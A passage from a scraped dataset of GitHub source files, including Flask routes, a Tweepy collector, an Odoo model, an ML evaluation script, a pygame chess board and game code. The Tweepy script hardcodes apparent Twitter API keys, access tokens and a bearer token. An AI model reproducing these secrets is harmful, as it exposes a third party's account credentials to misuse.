current_user\nimport sqlalchemy\nfrom flask import render_template, redirect, url_for, flash, request, current_app\n\nfrom app.models import StudentDetails, CourseworkInstance, Coursework\nfrom app.decorators import permission_required, role_required\nfrom app.student import bp\nfrom app.student.forms import StudentDetailsForm\nfrom app import db\n\n\n@bp.route('/main')\n@login_required\ndef student_main_page():\n return render_template('student/main.html')\n\n@bp.route('/details', methods = ['GET', 'POST'])\n@login_required\n@role_required('Student')\ndef get_student_details():\n form = StudentDetailsForm()\n \n student_details = StudentDetails.query.filter_by(user_id = current_user.id).first()\n\n if form.validate_on_submit():\n student_details = StudentDetails.query.filter_by(first_name = form.first_name.data, last_name = form.last_name.data).first()\n if student_details is None: \n student_details = StudentDetails(first_name = form.first_name.data, last_name = form.last_name.data, \n address = form.address.data, city = form.city.data, state = form.state.data,\n zip = form.zip.data, parent_name = form.parent_name.data, emergency_contact = form.emergency_contact.data,\n medical_conditions = form.medical_conditions.data, comments = form.comments.data, user_id=current_user.id)\n else:\n student_details.address = form.address.data\n student_details.city = form.city.data\n student_details.state = form.state.data\n student_details.zip = form.zip.data\n student_details.parent_name = form.parent_name.data\n student_details.emergency_contact = form.emergency_contact.data\n student_details.medical_conditions = form.medical_conditions.data\n student_details.comments = form.comments.data\n student_details.user_id = current_user.id\n\n db.session.add(student_details)\n db.session.commit()\n\n flash('Student Details entered successfully')\n\n return redirect(url_for('student.student_main_page'))\n if student_details is not None:\n form.first_name.data = student_details.first_name\n form.last_name.data = student_details.last_name\n form.address.data = student_details.address\n form.city.data = student_details.city\n form.state.data = student_details.state\n form.zip.data = student_details.zip\n form.parent_name.data = student_details.parent_name\n form.emergency_contact.data = student_details.emergency_contact\n form.medical_conditions.data = student_details.medical_conditions\n form.comments.data = student_details.comments\n \n\n return render_template('student/details.html', title='Enter Details',\n form=form)\n\n\n\n@bp.route('/grades', methods = ['GET'])\n@login_required\n@role_required('Student')\ndef get_student_grades():\n page = request.args.get('page', 1, type=int)\n coursework_items = CourseworkInstance.query.filter_by(student_id = current_user.id).paginate(\n page, current_app.config['CARDS_PER_PAGE'], False\n )\n \n next_url = url_for('student.get_student_grades', page=coursework_items.next_num) if coursework_items.has_next else None\n prev_url = url_for('student.get_student_grades', page=coursework_items.prev_num) if coursework_items.has_prev else None\n \n for item in coursework_items.items:\n print(item.coursework.name, item.coursework.classroom.name, item.value)\n\n return render_template('student/list_grades.html', title=f'Student - {current_user.username}',\n coursework_items=coursework_items.items, next_url=next_url,\n prev_url=prev_url)\n \n \n\n","repo_name":"Mega-Barrel/CUNY-Hackathon","sub_path":"app/student/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36402234830","text":"from typing import Any, Dict\n\n\nclass Response:\n def __init__(\n self,\n version: str,\n result: str = 'OK'\n ):\n self.version = version\n self.result = result\n self.output = {}\n self.directives = []\n\n def set_output(self, key, value):\n self.output[key] = value\n\n def remove_output(self, key):\n del self.output[key]\n\n def get_output(self, key):\n return self.output[key]\n\n def to_dict(self) -> Dict[str, Any]:\n response = {\n \"version\": self.version,\n \"resultCode\": self.result,\n \"output\": self.output\n }\n if self.directives != {}:\n response['directives'] = self.directives\n return response\n","repo_name":"gunyu1019/myschool","sub_path":"app/models/nugu/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"29167310360","text":"import json\r\nimport tweepy\r\nimport pandas as pd\r\n\r\n# load key\r\nconsumer_key = \"OA4CTZkyLwMOg08PlFt0goCNC\"\r\nconsumer_secret = \"8k59TeAGeqlHXjf4wjOjrKLYXpEvutuRgDjLxVxm5R7uC5wB0q\"\r\naccess_token = \"1177285260242874368-QoMZGUj2TsbkXyPQ5o0pu5iFrFT72q\"\r\naccess_token_secret = \"6JWjo6Ro4RmqIBFLjOop9QW1FCgHZltRTz8EIsj9UiMOE\"\r\nbearer_token = \"AAAAAAAAAAAAAAAAAAAAAISeXgEAAAAANwEgP0gtkLS%2Bjv9qCa3pIB3o1xs%3D98KYFXJI2DYHslg3StyrI2h9aB0w8PYq8iJyGS6Vdwsrhgkt7r\"\r\n\r\nauth = tweepy.OAuthHandler(consumer_key,consumer_secret)\r\nauth.set_access_token(access_token,access_token_secret)\r\n\r\napi = tweepy.API(auth)\r\n#write a function to collect some news and related statistical number\r\ndef truth(userid):\r\n tweets=api.user_timeline(user_id=userid,count=50,tweet_mode='extended') \r\n text=[]\r\n location=[]\r\n friends_count=[]\r\n followers_count=[]\r\n screen_name=[]\r\n retweet_count=[]\r\n favorite_count=[]\r\n description=[]\r\n#store what we need in a list \r\n for tweet in tweets:\r\n text.append(tweet._json['full_text'])\r\n location.append(tweet._json[\"user\"][\"location\"])\r\n friends_count.append(tweet._json[\"user\"][\"friends_count\"])\r\n followers_count.append(tweet._json[\"user\"][\"followers_count\"])\r\n screen_name.append(tweet._json[\"user\"][\"screen_name\"])\r\n description.append(tweet._json[\"user\"][\"description\"])\r\n retweet_count.append(tweet._json['retweet_count'])\r\n favorite_count.append(tweet._json['favorite_count'])\r\n#transform the list into dictionary\r\n dic={\"text\":text,\"location\":location,\"friends_count\":friends_count,\"followers_count\":followers_count,\"screen_name\":screen_name,\"retweet_count\":retweet_count,\"favorite_count\":favorite_count,\"description\":description}\r\n df=pd.DataFrame(dic)\r\n return(df)\r\ndf=truth(1367531)\r\n\r\nfor i in[5402612,15012486,1120655269,380648579,86141342,7309052,15679641,10433782,6577642]:\r\n df=pd.concat([df, truth(i)])\r\n\r\ndf.to_csv(r\"C:\\Windows\\System32\\anly-501-project-FlynnFlag\\data\\00-raw-data\\truth.csv\")\r\n\r\n","repo_name":"anly501/anly-501-project-FlynnFlag","sub_path":"codes/01-data-gathering/real_word_examples_python_api.py","file_name":"real_word_examples_python_api.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26086603997","text":"from loguru import logger\n\n\nclass ComponentManager:\n\n _components = []\n\n @classmethod\n def register(cls, component):\n if component in cls._components:\n return\n cls._components.append(component)\n logger.debug(f'Registered component {component} ({component.__module__})')\n\n @classmethod\n def all(cls):\n return [o() for o in cls._components]\n\n @classmethod\n def get(cls, name):\n for component in cls._components:\n if component.__name__ == name:\n return component()\n raise ValueError(f'Component {name} not found.')","repo_name":"robswc/stratis","sub_path":"app/components/manager/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"37"} +{"seq_id":"70279142507","text":"from odoo import api, fields, models\n\n\nclass HelpdeskTicket(models.Model):\n\n _inherit = \"helpdesk.ticket\"\n\n project_id = fields.Many2one(string=\"Project\", comodel_name=\"project.project\")\n task_id = fields.Many2one(\n string=\"Task\",\n comodel_name=\"project.task\",\n compute=\"_compute_task_id\",\n readonly=False,\n store=True,\n )\n\n @api.depends(\"project_id\")\n def _compute_task_id(self):\n for record in self:\n if record.task_id.project_id != record.project_id:\n record.task_id = False\n","repo_name":"OCA/helpdesk","sub_path":"helpdesk_mgmt_project/models/helpdesk_ticket.py","file_name":"helpdesk_ticket.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"37"} +{"seq_id":"35767297991","text":"from transformers import T5Tokenizer, T5ForConditionalGeneration\nimport transformers\nfrom transformers import RobertaTokenizer, RobertaModel\nfrom transformers import BertTokenizer, BertForSequenceClassification\nfrom sentence_transformers import SentenceTransformer\n\nimport json\nfrom transformers import Adafactor\nimport torch\nimport torch.optim as optim\nimport pickle\nimport torch.nn as nn\nimport random\nimport torch.nn.functional as F\nfrom collections import Counter\n\nfrom openprompt.plms import load_plm\nfrom openprompt import PromptDataLoader\nfrom openprompt.prompts.prefix_tuning_template import PrefixTuningTemplate\nfrom openprompt.prompts.prefix_tuning_template_env4 import PrefixTuningTemplate1\nfrom openprompt.prompts.prefix_state import PrefixState\nfrom openprompt import PromptForGeneration, PromptForGeneration1\nfrom openprompt.data_utils.utils import InputExample\n\nimport argparse\n\nparser=argparse.ArgumentParser()\nparser.add_argument('--test_file',type=str,default=None)\nparser.add_argument('--model_name',type=str,default='t5-base')\nparser.add_argument(\"--plm_eval_mode\", action=\"store_true\")\nparser.add_argument('--store',type=str,default=None)\nparser.add_argument('--num_token', type = int, default = None)\nparser.add_argument('--file1',type=str,default=None)\nparser.add_argument('--file2',type=str,default=None)\nparser.add_argument('--file3',type=str,default=None)\nparser.add_argument('--file', type = str, default = None)\nparser.add_argument('--diag_file', type = str, default = None)\nparser.add_argument('--eval_bs', type = int, default = None)\nparser.add_argument('--num_diag', type = int, default = 50)\nparser.add_argument('--average', type = bool, default = False)\nparser.add_argument('--maximum', type = bool, default =False)\nparser.add_argument('--use_wte', type = bool, default = False)\nparser.add_argument('--average_later', type = bool, default = False)\nargs=parser.parse_args()\n\ntorch.manual_seed(42)\n\nfile=open(args.test_file,'rb')\ndata_test=pickle.load(file)\nfile.close()\n\nfile=open(args.diag_file,'rb')\ndata_diag=pickle.load(file)[:args.num_diag]\nfile.close()\n \ndef read_data(data): \n lis=[]\n for i in range(len(data)):\n lis.append(InputExample(guid=str(i),text_a=data[i][0].replace('',''),tgt_text=data[i][1].replace('','')))\n\n return lis\n\ndataset={}\ndataset['test'] = read_data(data_test)\ndataset['diag'] = read_data(data_diag)\n \n\nclass Train:\n def __init__(self,dataset,args):\n self.dataset = dataset\n self.args=args\n\n print(args.use_wte)\n print(args.average)\n print(args.maximum)\n\n self.embed_params = torch.load(args.file).cuda()\n #self.weights = torch.load(args.weights).cuda()\n\n self.name = self.args.test_file.split('_')[0]\n\n self.eval_bs=args.eval_bs\n self.use_cuda = True\n\n plm, tokenizer, model_config, WrapperClass = load_plm(args.model_name.split('-')[0], args.model_name)\n self.tokenizer = tokenizer\n self.plm = plm\n prefix_state1 = PrefixState(model=plm, num_token=args.num_token, tokenizer=tokenizer, placeholder_mapping = {'': 'text_a', '': 'text_b'})\n prefix_state2 = PrefixState(model=plm, num_token=args.num_token, tokenizer=tokenizer, placeholder_mapping = {'': 'text_a', '': 'text_b'})\n prefix_state3 = PrefixState(model=plm, num_token=args.num_token, tokenizer=tokenizer, placeholder_mapping = {'': 'text_a', '': 'text_b'})\n prefix_state1.load_state_dict(torch.load(args.file1))\n prefix_state2.load_state_dict(torch.load(args.file2))\n prefix_state3.load_state_dict(torch.load(args.file3))\n\n self.mytemplate = PrefixTuningTemplate(model=plm, num_token=args.num_token, tokenizer=tokenizer, placeholder_mapping = {'': 'text_a', '': 'text_b'}, prefix1 = prefix_state1, prefix2 = prefix_state2, prefix3 = prefix_state3, maximum = args.maximum, use_wte = args.use_wte)\n\n self.test_dataloader = PromptDataLoader(dataset=dataset[\"test\"], template=self.mytemplate, tokenizer=tokenizer,\n tokenizer_wrapper_class=WrapperClass, max_seq_length=512, decoder_max_length=200,\n batch_size=self.eval_bs,shuffle=False, teacher_forcing=False, predict_eos_token=True,\n truncate_method=\"head\")\n\n self.prompt_model = PromptForGeneration(plm=plm,template=self.mytemplate, freeze_plm=True,tokenizer=tokenizer, plm_eval_mode=args.plm_eval_mode) \n \n if self.use_cuda:\n self.prompt_model = self.prompt_model.cuda()\n\n plm1, tokenizer, model_config, WrapperClass = load_plm(args.model_name.split('-')[0], args.model_name)\n plm2, tokenizer, model_config, WrapperClass = load_plm(args.model_name.split('-')[0], args.model_name)\n plm3, tokenizer, model_config, WrapperClass = load_plm(args.model_name.split('-')[0], args.model_name)\n self.mytemplate1 = PrefixTuningTemplate1(model=plm1, num_token=args.num_token, tokenizer=tokenizer, placeholder_mapping = {'': 'text_a', '': 'text_b'}, file = args.file)\n self.mytemplate2 = PrefixTuningTemplate1(model=plm2, num_token=args.num_token, tokenizer=tokenizer, placeholder_mapping = {'': 'text_a', '': 'text_b'}, file = args.file)\n self.mytemplate3 = PrefixTuningTemplate1(model=plm3, num_token=args.num_token, tokenizer=tokenizer, placeholder_mapping = {'': 'text_a', '': 'text_b'}, file = args.file)\n\n self.validation_dataloader1 = PromptDataLoader(dataset=dataset[\"diag\"], template=self.mytemplate1, tokenizer=tokenizer,\n tokenizer_wrapper_class=WrapperClass, max_seq_length=512, decoder_max_length=200,\n batch_size=self.eval_bs,shuffle=False, teacher_forcing=False, predict_eos_token=True,\n truncate_method=\"head\")\n \n self.validation_dataloader2 = PromptDataLoader(dataset=dataset[\"diag\"], template=self.mytemplate2, tokenizer=tokenizer,\n tokenizer_wrapper_class=WrapperClass, max_seq_length=512, decoder_max_length=200,\n batch_size=self.eval_bs,shuffle=False, teacher_forcing=False, predict_eos_token=True,\n truncate_method=\"head\")\n\n self.validation_dataloader3 = PromptDataLoader(dataset=dataset[\"diag\"], template=self.mytemplate3, tokenizer=tokenizer,\n tokenizer_wrapper_class=WrapperClass, max_seq_length=512, decoder_max_length=200,\n batch_size=self.eval_bs,shuffle=False, teacher_forcing=False, predict_eos_token=True,\n truncate_method=\"head\")\n\n self.mytemplate1.load_state_dict(torch.load(args.file1))\n self.mytemplate2.load_state_dict(torch.load(args.file2))\n self.mytemplate3.load_state_dict(torch.load(args.file3))\n\n self.prompt_model1 = PromptForGeneration1(plm=plm1,template=self.mytemplate1, freeze_plm=True,tokenizer=tokenizer, plm_eval_mode=args.plm_eval_mode)\n self.prompt_model2 = PromptForGeneration1(plm=plm2,template=self.mytemplate2, freeze_plm=True,tokenizer=tokenizer, plm_eval_mode=args.plm_eval_mode)\n self.prompt_model3 = PromptForGeneration1(plm=plm3,template=self.mytemplate3, freeze_plm=True,tokenizer=tokenizer, plm_eval_mode=args.plm_eval_mode) \n \n if self.use_cuda:\n self.prompt_model1 = self.prompt_model1.cuda()\n self.prompt_model2 = self.prompt_model2.cuda()\n self.prompt_model3 = self.prompt_model3.cuda()\n\n sentences1 = self.val1(self.prompt_model1, self.validation_dataloader1)\n sentences2 = self.val1(self.prompt_model2, self.validation_dataloader2)\n sentences3 = self.val1(self.prompt_model3, self.validation_dataloader3)\n \n model = SentenceTransformer('all-MiniLM-L6-v2')\n d1, d2, d3 = 0, 0, 0\n if args.average_later == False:\n for i in range(len(sentences1)):\n #print(torch.tensor(model.encode(sentences1[i])).shape, torch.tensor(model.encode(dataset['validation'][i].text_a)).shape)\n d1 += F.cosine_similarity(torch.tensor(model.encode(sentences1[i])).unsqueeze(0), torch.tensor(model.encode(dataset['diag'][i].text_a)).unsqueeze(0))[0]\n d2 += F.cosine_similarity(torch.tensor(model.encode(sentences2[i])).unsqueeze(0), torch.tensor(model.encode(dataset['diag'][i].text_a)).unsqueeze(0))[0]\n d3 += F.cosine_similarity(torch.tensor(model.encode(sentences3[i])).unsqueeze(0), torch.tensor(model.encode(dataset['diag'][i].text_a)).unsqueeze(0))[0]\n \n self.weights = F.softmax(torch.tensor([d1, d2, d3]), dim = -1).cuda()\n\n else:\n self.weights = 0\n for i in range(len(sentences1)):\n #print(torch.tensor(model.encode(sentences1[i])).shape, torch.tensor(model.encode(dataset['validation'][i].text_a)).shape)\n d1 = F.cosine_similarity(torch.tensor(model.encode(sentences1[i])).unsqueeze(0), torch.tensor(model.encode(dataset['diag'][i].text_a)).unsqueeze(0))[0]\n d2 = F.cosine_similarity(torch.tensor(model.encode(sentences2[i])).unsqueeze(0), torch.tensor(model.encode(dataset['diag'][i].text_a)).unsqueeze(0))[0]\n d3 = F.cosine_similarity(torch.tensor(model.encode(sentences3[i])).unsqueeze(0), torch.tensor(model.encode(dataset['diag'][i].text_a)).unsqueeze(0))[0]\n self.weights = self.weights + F.softmax(torch.tensor([d1, d2, d3]), dim = -1).cuda()\n \n self.weights = self.weights/len(sentences1)\n\n if args.average == True:\n self.weights = torch.tensor([1/3, 1/3, 1/3]).cuda()\n\n print('testing')\n #print(self.weights)\n with torch.no_grad(): self.val(0)\n\n def val1(self, model, data):\n generated_sentence = []\n groundtruth_sentence = []\n model.eval()\n \n for step, inputs in enumerate(data):\n if self.use_cuda:\n inputs = inputs.cuda()\n \n _,output_sentence=model.generate(inputs,\n num_beams=10, \\\n early_stopping=True, max_length=200,output_hidden_states=True,output_attentions=True)\n\n output_sentence=[o.replace('','').replace('','').replace('','').replace('','') for o in output_sentence]\n gold = [ii.replace('','').replace('','').replace('','').replace('','') for ii in inputs['tgt_text']]\n \n generated_sentence.extend(output_sentence)\n groundtruth_sentence.extend(inputs['tgt_text'])\n\n return generated_sentence\n\n\n def val(self,epoch):\n generated_sentence = []\n groundtruth_sentence = []\n self.prompt_model.eval()\n \n for step, inputs in enumerate(self.test_dataloader):\n ids = inputs['input_ids']\n tokens = self.tokenizer.batch_decode(ids)\n\n inputs['embeddings'] = self.embed_params.unsqueeze(0).tile(len(tokens), 1, 1)\n\n if self.use_cuda:\n inputs = inputs.cuda()\n \n _,output_sentence=self.prompt_model.generate(inputs,\n num_beams=10, \\\n early_stopping=True, max_length=200,output_hidden_states=True,output_attentions=True, weights = self.weights.unsqueeze(0).tile(len(tokens), 1))\n\n output_sentence=[o.replace('','').replace('','').replace('','').replace('','') for o in output_sentence]\n gold = [ii.replace('','').replace('','').replace('','').replace('','') for ii in inputs['tgt_text']]\n \n generated_sentence.extend(output_sentence)\n groundtruth_sentence.extend(inputs['tgt_text'])\n print(len(generated_sentence))\n print(len(groundtruth_sentence))\n\n acc = 0\n file=open(self.args.store+'/'+str(epoch)+self.name+'_test_gen.txt','w')\n file1=open(self.args.store+'/'+str(epoch)+self.name+'_test_ref.txt','w')\n for i in range(len(generated_sentence)):\n file1.write(groundtruth_sentence[i].strip()+'\\n')\n file.write(generated_sentence[i].strip()+'\\n')\n if groundtruth_sentence[i].strip() == generated_sentence[i].strip(): acc+=1\n\n file.close()\n file1.close()\n \n print(100*acc/len(generated_sentence))\n\ntrainer=Train(dataset,args)\n","repo_name":"pranavajitnair/DAPA","sub_path":"main_approach.py","file_name":"main_approach.py","file_ext":"py","file_size_in_byte":13398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7202995151","text":"import os.path\nimport shutil\nimport sys\n\n\ndef m3u_copy(source, destination):\n try:\n file = open(source).readlines()\n except IOError:\n print(\"Cannot open m3u file\")\n return\n if not os.path.exists(destination) or not os.path.isdir(destination):\n print(\"No such destination directory or destination is not a directory\")\n return\n if \"/\" in source:\n source_path = source[:source.rindex(\"/\")+1]\n else:\n source_path = \"\"\n shutil.copy(source, destination)\n for line in file:\n if line.strip() != '':\n line = line[:len(line) - 1]\n if \"/\" in line and not os.path.exists(destination + line[:line.rindex(\"/\") + 1]):\n os.makedirs(destination + line[:line.rindex(\"/\") + 1])\n if not os.path.isfile(source_path + line):\n print(f\"{line} does not exist\")\n else:\n try:\n shutil.copy(source_path + line, destination + line)\n except IOError:\n print(f\"{line} cannot be copied, function terminated\")\n return\n\n\ndef main():\n if len(sys.argv) != 3:\n print(\"Usage: python ./m3u_copy \")\n else:\n m3u_copy(sys.argv[1], sys.argv[2])\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"SBanczyk/m3u_copy","sub_path":"m3u_copy.py","file_name":"m3u_copy.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18992883079","text":"#!/usr/bin/env python3\nimport tflite_runtime.interpreter as tflite\nimport numpy as np\nimport cv2 as cv\nimport matplotlib.pyplot as plt\n#from picamera import PiCamera\n#from picamera.array import PiRGBArray\nimport serial\nfrom time import sleep\n\n\n# Image Directory\nim_dir = '/home/pi/Mechatronics/Navigation/images'\n\n# Setup interpreter\ninterpreter = tflite.Interpreter(model_path='Nav-Model-1.tflite')\ninterpreter.allocate_tensors()\n\ninput_details = interpreter.get_input_details()\noutput_details = interpreter.get_output_details()\n\n# check the type of the input tensor\nfloating_model = input_details[0]['dtype']== np.float32\n\nfor i in range(0,5):\n\tinput_data = np.asarray([cv.cvtColor(cv.imread(im_dir+'/img'+str(i)+'.jpg'),cv.COLOR_BGR2RGB)], dtype=np.float32)\n\tprint(input_data.shape, type(input_data[0][0][0][0]))\n\n\tinterpreter.set_tensor(0,input_data)\n\t#interpreter.set_tensor(input_details[0]['index'],input_data)\n\n\tinterpreter.invoke()\n\n\t#output_data = interpreter.get_tensor(output_details[0]['index'])\n\t#results = np.squeeze(output_data)\n\toutput_data = interpreter.get_tensor(37)\n\tprint(output_data)\n\tprint(output_details[0]['index'])\n","repo_name":"Mitchelldscott/Mechatronics","sub_path":"Targeting/Threading/tf_test.py","file_name":"tf_test.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1867479679","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport Chess_pieces\nimport pygame\nimport chess\nimport math\n\n\n# In[2]:\n\n\n# Resize the image to a specific size\nnew_size = (90, 90) # Set the desired size\n#names\nb_pawn = pygame.transform.scale(pygame.image.load('Chess_pieces//b_pawn.png'), new_size)\nb_knight = pygame.transform.scale(pygame.image.load('Chess_pieces//b_knight.png'), new_size)\nb_bishop = pygame.transform.scale(pygame.image.load('Chess_pieces//b_bishop.png'), new_size)\nb_rook = pygame.transform.scale(pygame.image.load('Chess_pieces//b_rook.png'), new_size)\nb_queen = pygame.transform.scale(pygame.image.load('Chess_pieces//b_queen.png'), new_size)\nb_king = pygame.transform.scale(pygame.image.load('Chess_pieces//b_king.png'), new_size)\nw_pawn = pygame.transform.scale(pygame.image.load('Chess_pieces//w_pawn.png'), new_size)\nw_knight = pygame.transform.scale(pygame.image.load('Chess_pieces//w_knight.png'), new_size)\nw_bishop = pygame.transform.scale(pygame.image.load('Chess_pieces//w_bishop.png'), new_size)\nw_rook = pygame.transform.scale(pygame.image.load('Chess_pieces//w_rook.png'), new_size)\nw_queen = pygame.transform.scale(pygame.image.load('Chess_pieces//w_queen.png'), new_size)\nw_king = pygame.transform.scale(pygame.image.load('Chess_pieces/w_king.png'), new_size)\n\n\n# In[3]:\n\n\n#initialise display\nX = 800\nY = 800\nscrn = pygame.display.set_mode((X, Y))\n\n#basic colours\nWHITE = (255, 255, 255)\nGREY = (128, 128, 128)\nYELLOW = (204, 204, 0)\nBLUE = (50, 255, 255)\nBLACK = (0, 0, 0)\n\n#initialise chess board\n\n\n#load piece images\npieces = {'p': b_pawn.convert(),\n 'n': b_knight.convert(),\n 'b': b_bishop.convert(),\n 'r': b_rook.convert(),\n 'q': b_queen.convert(),\n 'k': b_king.convert(),\n 'P': w_pawn.convert(),\n 'N': w_knight.convert(),\n 'B': w_bishop.convert(),\n 'R': w_rook.convert(),\n 'Q': w_queen.convert(),\n #'K': pygame.image.load('Chess_pieces//w_king.png').convert(),\n 'K': w_king.convert()\n \n }\n\n\n# In[ ]:\n\n\ndef update(scrn, board):\n '''\n Updates the screen based on the board class\n '''\n\n for i in range(64):\n piece = board.piece_at(i)\n if piece is None:\n continue\n else:\n piece_image = pieces[str(piece)]\n piece_rect = piece_image.get_rect()\n\n # Calculate the position to center the piece\n x = (i % 8) * 100 + (100 - piece_rect.width) // 2\n y = 700 - (i // 8) * 100 + (100 - piece_rect.height) // 2\n\n scrn.blit(piece_image, (x, y))\n\n for i in range(7):\n i = i + 1\n pygame.draw.line(scrn, WHITE, (0, i * 100), (800, i * 100))\n pygame.draw.line(scrn, WHITE, (i * 100, 0), (i * 100, 800))\n\n pygame.display.flip()\n\n\n# In[4]:\n\n\ndef main(BOARD):\n\n '''\n for human vs human game\n '''\n #make background black\n scrn.fill(BLACK)\n #name window\n pygame.display.set_caption('Chess')\n \n #variable to be used later\n index_moves = []\n\n status = True\n while (status):\n #update screen\n update(scrn,BOARD)\n\n for event in pygame.event.get():\n \n # if event object type is QUIT\n # then quitting the pygame\n # and program both.\n if event.type == pygame.QUIT:\n status = False\n\n # if mouse clicked\n if event.type == pygame.MOUSEBUTTONDOWN:\n #remove previous highlights\n scrn.fill(BLACK)\n #get position of mouse\n pos = pygame.mouse.get_pos()\n\n #find which square was clicked and index of it\n square = (math.floor(pos[0]/100),math.floor(pos[1]/100))\n index = (7-square[1])*8+(square[0])\n \n # if we are moving a piece\n if index in index_moves: \n \n move = moves[index_moves.index(index)]\n \n BOARD.push(move)\n\n #reset index and moves\n index=None\n index_moves = []\n \n \n # show possible moves\n else:\n #check the square that is clicked\n piece = BOARD.piece_at(index)\n #if empty pass\n if piece == None:\n \n pass\n else:\n \n #figure out what moves this piece can make\n all_moves = list(BOARD.legal_moves)\n moves = []\n for m in all_moves:\n if m.from_square == index:\n \n moves.append(m)\n\n t = m.to_square\n\n TX1 = 100*(t%8)\n TY1 = 100*(7-t//8)\n\n \n #highlight squares it can move to\n pygame.draw.rect(scrn,BLUE,pygame.Rect(TX1,TY1,100,100),5)\n \n index_moves = [a.to_square for a in moves]\n \n # deactivates the pygame library\n if BOARD.outcome() != None:\n print(BOARD.outcome())\n status = False\n print(BOARD)\n pygame.quit()\n\n\n# In[5]:\n\n\n\npygame.init()\nb = chess.Board()\nmain(b)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[9]:\n\n\n\n\ndef main_one_agent(BOARD,agent,agent_color):\n \n '''\n for agent vs human game\n color is True = White agent\n color is False = Black agent\n '''\n \n #make background black\n scrn.fill(BLACK)\n #name window\n pygame.display.set_caption('Chess')\n \n #variable to be used later\n index_moves = []\n\n status = True\n while (status):\n #update screen\n update(scrn,BOARD)\n \n \n if BOARD.turn==agent_color:\n BOARD.push(agent(BOARD))\n scrn.fill(BLACK)\n\n else:\n\n for event in pygame.event.get():\n \n # if event object type is QUIT\n # then quitting the pygame\n # and program both.\n if event.type == pygame.QUIT:\n status = False\n\n # if mouse clicked\n if event.type == pygame.MOUSEBUTTONDOWN:\n #reset previous screen from clicks\n scrn.fill(BLACK)\n #get position of mouse\n pos = pygame.mouse.get_pos()\n\n #find which square was clicked and index of it\n square = (math.floor(pos[0]/100),math.floor(pos[1]/100))\n index = (7-square[1])*8+(square[0])\n \n # if we have already highlighted moves and are making a move\n if index in index_moves: \n \n move = moves[index_moves.index(index)]\n #print(BOARD)\n #print(move)\n BOARD.push(move)\n index=None\n index_moves = []\n \n # show possible moves\n else:\n \n piece = BOARD.piece_at(index)\n \n if piece == None:\n \n pass\n else:\n\n all_moves = list(BOARD.legal_moves)\n moves = []\n for m in all_moves:\n if m.from_square == index:\n \n moves.append(m)\n\n t = m.to_square\n\n TX1 = 100*(t%8)\n TY1 = 100*(7-t//8)\n\n \n pygame.draw.rect(scrn,BLUE,pygame.Rect(TX1,TY1,100,100),5)\n #print(moves)\n index_moves = [a.to_square for a in moves]\n \n # deactivates the pygame library\n if BOARD.outcome() != None:\n print(BOARD.outcome())\n status = False\n print(BOARD)\n pygame.quit()\n\n\n# In[10]:\n\n\n\n\ndef main_two_agent(BOARD,agent1,agent_color1,agent2):\n '''\n for agent vs agent game\n \n '''\n \n #make background black\n scrn.fill(BLACK)\n #name window\n pygame.display.set_caption('Chess')\n \n #variable to be used later\n\n status = True\n while (status):\n #update screen\n update(scrn,BOARD)\n \n if BOARD.turn==agent_color1:\n BOARD.push(agent1(BOARD))\n\n else:\n BOARD.push(agent2(BOARD))\n\n scrn.fill(BLACK)\n \n for event in pygame.event.get():\n \n # if event object type is QUIT\n # then quitting the pygame\n # and program both.\n if event.type == pygame.QUIT:\n status = False\n \n # deactivates the pygame library\n if BOARD.outcome() != None:\n print(BOARD.outcome())\n status = False\n print(BOARD)\n pygame.quit()\n\n\n# In[11]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"dkimb0526/ChessAI","sub_path":"Chess.py","file_name":"Chess.py","file_ext":"py","file_size_in_byte":9556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31240256797","text":"import sys\nimport pygame\nfrom pygame import mixer\nfrom time import sleep\n\nfrom settings import Settings\nfrom ship import Ship\nfrom bullet import Bullet\nfrom alien import Alien\nfrom game_stats import GameStats\nfrom button import Button\nfrom scoreboard import Scoreboard\n\n\nclass AlienInvasion:\n \"\"\"Overall Class to manage game and behaviors\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the game, and create resources\"\"\"\n pygame.init()\n self.settings = Settings()\n\n # Set screen size\n # self.screen = pygame.display.set_mode((self.settings.screen_width, self.settings.screen_height))\n # full screen\n self.screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\n self.settings.screen_width = self.screen.get_rect().width\n self.settings.screen_height = self.screen.get_rect().height\n\n pygame.display.set_caption(\"Alien Invasion\")\n\n self.stats = GameStats(self)\n self.sb = Scoreboard(self)\n self.ship = Ship(self)\n self.bullets = pygame.sprite.Group()\n self.aliens = pygame.sprite.Group()\n self._create_fleet()\n\n self.play_button = Button(self, \"Play\")\n\n mixer.init()\n self.beam_sound = mixer.Sound(\"sounds/beam.wav\")\n self.gun_sound = mixer.Sound('sounds/gun.wav')\n self.pop_sound = mixer.Sound('sounds/pop.wav')\n self.crash_sound = mixer.Sound('sounds/crash.mp3')\n\n\n def run_game(self):\n \"\"\"Start the main loop of game\"\"\"\n while True:\n # Watch keyboard and mouse for input events\n self._check_events()\n\n if self.stats.game_active:\n # position and update the Ship\n self.ship.update()\n # update bullet positions\n self._update_bullets()\n # alien ships\n self._update_aliens()\n 